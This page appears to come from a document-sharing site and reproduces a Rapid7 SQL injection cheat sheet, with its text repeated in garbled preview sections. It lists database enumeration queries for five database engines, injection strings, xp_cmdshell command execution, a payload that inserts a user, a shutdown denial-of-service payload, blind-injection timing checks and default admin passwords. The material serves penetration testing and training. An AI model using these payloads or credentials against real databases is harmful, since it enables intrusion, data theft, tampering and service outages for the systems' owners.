SQL Injection Cheat Sheet: Common Commands and Techniques | Cheat Sheet Programming Languages

SQL INJECTION CHEAT SHEET Common SQL Injection Commands for Backend Databases

MS-SQL

Grab version @@version

Users name FROM master..syslogins

Tables name FROM master..sysobjects WHERE xtype = ‘U’

Database name FROM master..sysdatabases;

Columns name FROM syscolumns WHERE id = (SELECT id

FROM sysobjects WHERE name = ‘<TABLENAME’)

Running User DB_NAME()

Oracle

Grab version table v$version compare with ‘Oracle%’

Users * from dba_users

Tables table_name from all_tables

Database distinct owner from all_tables

Columns column_name from all_tab_columns where table_

name=‘<TABLENAME>

Running User user from dual

IBM DB2

Grab version Versionnumber from sysibm.sysversions;

Users user from sysibm.sysdummy1

Tables name from sysibm.systables

Database schemaname from syscat.schemata

Columns name, tbname, coltype from sysibm.syscolumns

Running User user from sysibm.sysdummy1

MySQL

Grab version @@version

Users * from mysql.user

Tables table_schema,table_name FROM information_

schema.tables WHERE table_schema != ‘mysql’

AND table_schema != ‘information_schema’

Database distinct(db) FROM mysql.db

Columns table_schema, column_name FROM information_

schema.columns WHERE table_schema != ‘mysql’

AND table_schema != ‘information_schema’ AND

table_name == ‘<TABLENAME>’

Running User user()

PostgreSQL

Grab version version()

Users * from pg_user

Database datname FROM pg_database

Running User user;

SQL Injection Discovery

Common SQL Injection Attack Strings

Query syntax breaking Single Quote(‘), Double Quote(“)

Injection SQL comment Hyphens (--), Hash(#), Comment(/*)

Extending/Appending queries Semicolon (;)

Injecting/Bypassing filters CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CON-

VERT(), NULL

Common SQL Injection Commands

Injecting Union Union all select NULL (Multiple columns)

Running Command 1;exec master..xp_cmdshell ‘dir’>C:\inetpub\ww-

wroot\dir.txt’ OR master.dbo.xp_cmdshell

Loading Files LOAD_FILE(), User UTL_FILE and utfRead-

fileAsTable

Adding user 1’; insert into users values(‘nto’,’nto123’)

DoS 1’;shutdown –

Fetching Fields select name from syscolumns where id =(select

id FROM sysobjects where name = ‘target table

name’) – (Union can help)Co

Common Blind SQL Injection Commands

Quick Check AND 1=1, AND 1=0

User Check 1+AND+USER_NAME()=’dbo’

Injecting Wait 1;waitfor+delay+’0:0:10’

Check for sa SELECT+ASCII(SUBSTRING((a.

loginame),1,1))+FROM+master..

sysprocesses+AS+a+WHERE+a.spid+=+@@

SPID)=115

Looping/Sleep BENCHMARK(TIMES, TASK), pg_sleep(10)

Default Usernames/Passwords

Oracle scott/tiger, dbsnmp/dbsnmp

MySQL mysql/<BLANK>, root/<BLANK>

PostgreSQL postgres/<BLANK>

MS-SQL sa/<BLANK>

DB2 db2admin/db2admin

www.rapid7.com

Partial preview of the text

Download SQL Injection Cheat Sheet: Common Commands and Techniques and more Cheat Sheet Programming Languages in PDF only on Docsity!

SQL INJECTION CHEAT SHEET

Common SQL Injection Commands for Backend Databases

MS-SQL

Grab version @@version Users name FROM master..syslogins Tables name FROM master..sysobjects WHERE xtype = ‘U’ Database name FROM master..sysdatabases; Columns name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’) Running User DB_NAME()

Oracle

Grab version table v$version compare with ‘Oracle%’ Users * from dba_users Tables table_name from all_tables Database distinct owner from all_tables Columns column_name from all_tab_columns where table_ name=‘ Running User user from dual

IBM DB

Grab version Versionnumber from sysibm.sysversions; Users user from sysibm.sysdummy Tables name from sysibm.systables Database schemaname from syscat.schemata Columns name, tbname, coltype from sysibm.syscolumns Running User user from sysibm.sysdummy

MySQL

Grab version @@version Users * from mysql.user Tables table_schema,table_name FROM information_ schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ Database distinct(db) FROM mysql.db Columns table_schema, column_name FROM information_ schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘’ Running User user()

PostgreSQL

Grab version version() Users * from pg_user Database datname FROM pg_database Running User user;

SQL Injection Discovery

Common SQL Injection Attack Strings

Query syntax breaking Single Quote(‘), Double Quote(“) Injection SQL comment Hyphens (--), Hash(#), Comment(/*) Extending/Appending queries Semicolon (;) Injecting/Bypassing filters CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CON- VERT(), NULL

Common SQL Injection Commands

Injecting Union Union all select NULL (Multiple columns) Running Command 1;exec master..xp_cmdshell ‘dir’>C:\inetpub\ww- wroot\dir.txt’ OR master.dbo.xp_cmdshell Loading Files LOAD_FILE(), User UTL_FILE and utfRead- fileAsTable Adding user 1’; insert into users values(‘nto’,’nto123’) DoS 1’;shutdown – Fetching Fields select name from syscolumns where id =(select id FROM sysobjects where name = ‘target table name’) – (Union can help)Co

Common Blind SQL Injection Commands

Quick Check AND 1=1, AND 1= User Check 1+AND+USER_NAME()=’dbo’ Injecting Wait 1;waitfor+delay+’0:0:10’ Check for sa SELECT+ASCII(SUBSTRING((a. loginame),1,1))+FROM+master.. sysprocesses+AS+a+WHERE+a.spid+=+@@ SPID)= Looping/Sleep BENCHMARK(TIMES, TASK), pg_sleep(10)

Default Usernames/Passwords

Oracle scott/tiger, dbsnmp/dbsnmp MySQL mysql/, root/ PostgreSQL postgres/ MS-SQL sa/ DB2 db2admin/db2admin

SQL Injection Cheat Sheet: Common Commands and Techniques, Cheat Sheet of Programming Languages

Related documents

Partial preview of the text

Download SQL Injection Cheat Sheet: Common Commands and Techniques and more Cheat Sheet Programming Languages in PDF only on Docsity!

SQL INJECTION CHEAT SHEET

Common SQL Injection Commands for Backend Databases

MS-SQL

Oracle

IBM DB

MySQL

PostgreSQL

SQL Injection Discovery

Common SQL Injection Attack Strings

Common SQL Injection Commands

Common Blind SQL Injection Commands

Default Usernames/Passwords

www.rapid7.com